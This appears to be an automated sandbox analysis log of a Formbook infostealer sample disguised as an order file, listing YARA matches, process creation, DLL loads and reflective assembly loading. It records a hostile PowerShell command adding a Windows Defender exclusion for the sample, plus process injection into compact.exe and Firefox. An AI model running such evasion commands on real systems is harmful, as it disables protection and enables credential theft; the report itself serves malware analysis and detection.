Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2134444569.000000000CF90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2132983409.00000000077E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2120287530.0000000002791000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2133206549.000000000780A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2133206549.000000000780A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.00000000014AD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Binary or memory string: OriginalFilenameCAhp.exe> vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Uses 32bit PE files

Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, DJO8vVomSf1ydRl3pV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, DJO8vVomSf1ydRl3pV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, DJO8vVomSf1ydRl3pV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/7@15/13

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.log

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process created: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process created: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, mainscreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.77e0000.5.raw.unpack, -Module-.cs	.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.77e0000.5.raw.unpack, PingPong.cs	.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.cs	.Net Code: s0H3RLDQ8P System.Reflection.Assembly.Load(byte[])
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.27bc388.0.raw.unpack, -Module-.cs	.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.27bc388.0.raw.unpack, PingPong.cs	.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.cs	.Net Code: s0H3RLDQ8P System.Reflection.Assembly.Load(byte[])
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.cs	.Net Code: s0H3RLDQ8P System.Reflection.Assembly.Load(byte[])
Source: 10.2.compact.exe.3bfcd08.2.raw.unpack, mainscreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 13.0.EUSOiCcoIEEJJ.exe.298cd08.1.raw.unpack, mainscreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 13.2.EUSOiCcoIEEJJ.exe.298cd08.1.raw.unpack, mainscreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 14.2.firefox.exe.252dcd08.0.raw.unpack, mainscreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_00A746BB push edx; iretd	0_2_00A746BE
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_00A74660 push edx; iretd	0_2_00A74662
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_00A74659 push edx; iretd	0_2_00A7465A
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_00A747AF push esi; iretd	0_2_00A747B2
